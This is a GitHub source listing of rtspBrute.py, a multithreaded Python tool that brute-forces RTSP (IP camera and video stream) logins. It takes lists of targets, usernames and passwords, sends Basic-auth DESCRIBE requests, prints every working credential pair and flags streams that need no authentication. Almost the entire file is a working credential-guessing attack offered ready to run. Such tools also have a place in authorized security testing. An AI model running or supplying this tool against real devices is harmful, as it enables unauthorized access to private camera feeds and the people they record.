-
Notifications
You must be signed in to change notification settings - Fork 8
/
rtspBrute.py
154 lines (136 loc) · 5.62 KB
/
rtspBrute.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
# /usr/bin/python3
import base64
import socket
import threading
import fire
import re
import queue
import time
from pathlib import Path
class RtspBrute(object):
"""
RtspBrute
RtspBrute is a RTSP(Real Time Streaming Protocol) brute tool.
Example:
python3 oneforall.py -t 127.0.0.1 -u admin --password admin123 run
python3 oneforall.py -t 127.0.0.1,127.0.0.2 -u ./username.txt --password admin123456 run
python3 oneforall.py -t ./targets.txt -u admin --password admin123 --port 555 run
:param str target: ip:port or file example:127.0.0.1:554 127.0.0.2:554 or ./targets.txt
:param str username: username or username file
:param str password: password or password file
:param str port: default port 554
"""
def __init__(self, target, username, password, port=554):
self.port = port
self.targetlist = self.param_to_list(target, method='target')
self.usernamelist = self.param_to_list(username)
self.passwordlist = self.param_to_list(password)
def run(self):
print("There are %s targets" % len(self.targetlist))
print("Use %s usernames" % len(self.usernamelist))
print("Use %s passwords" % len(self.passwordlist))
threads = 100
global q
q = queue.Queue()
for _target in self.targetlist:
q.put(_target)
threads = min(len(self.targetlist), threads)
print("Use %s threads" % threads)
_threads = []
for i in range(threads):
t = threading.Thread(target=self.brute_force, args=())
_threads.append(t)
for t in _threads:
t.setDaemon(True)
t.start()
for t in _threads:
t.join()
print("Finished all threads")
def vaild_target(self, target):
regex = re.compile(
r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
result = re.search(regex, target)
if result:
return result[0]
else:
return None
def param_to_list(self, param, method=""):
list = set()
path = Path(param)
if path.exists() and path.is_file():
with open(path, encoding='utf-8', errors='ignore') as file:
for line in file:
if method == "":
list.add(line.strip())
elif method == "target":
line = self.vaild_target(line.strip())
list.add(line.strip() + ":" + str(self.port))
return list
else:
if method == "":
list = param.split(',')
elif method == "target":
list = param.split(',')
for i in range(len(list)):
list[i] = list[i]+':'+str(self.port)
return list
def rtsp_request(self, target, username="", password=""):
if username:
auth = username + ":" + password
auth_base64 = base64.b64encode(auth.encode()).decode()
req = "DESCRIBE rtsp://{} RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic {}\r\n\r\n".format(target,
auth_base64)
else:
req = "DESCRIBE rtsp://{} RTSP/1.0\r\nCSeq: 2\r\n\r\n".format(
target)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
try:
s.connect((target.split(":")[0], int(target.split(":")[1])))
s.sendall(req.encode())
data = s.recv(1024).decode()
return data
except KeyboardInterrupt:
# print("The run was interrupted by the user pressing Ctl-C")
return
except (socket.timeout, TimeoutError):
# print("The test timed out trying to reach the IP provided. Check your IP and network and try again")
return
except (socket.error, OSError):
# print("There is a networking problem. Please check your network and try again")
return
def brute_force(self):
while not q.empty():
target = q.get()
# print(target)
data = self.rtsp_request(target=target)
if data:
if "401 Unauthorized" in data:
# print("401 Unauthorized")
for username in self.usernamelist:
for password in self.passwordlist:
# print(password)
if "WWW-Authenticate: Basic" in data:
data = self.rtsp_request(
target, username, password)
if "200 OK" in data:
print(
"{},{},{}".format(target, username, password))
pass
if "401 Unauthorized" in data:
time.sleep(1)
# print("401 Unauthorized")
continue
pass
elif "200 OK" in data:
print(
"The RTSP service at: " + target + " allows unauthorized access and does not need a username/password")
else:
pass
# print("Unkonwn problem from %s" % target)
# print(data)
else:
pass
pass
if __name__ == '__main__':
fire.Fire(RtspBrute)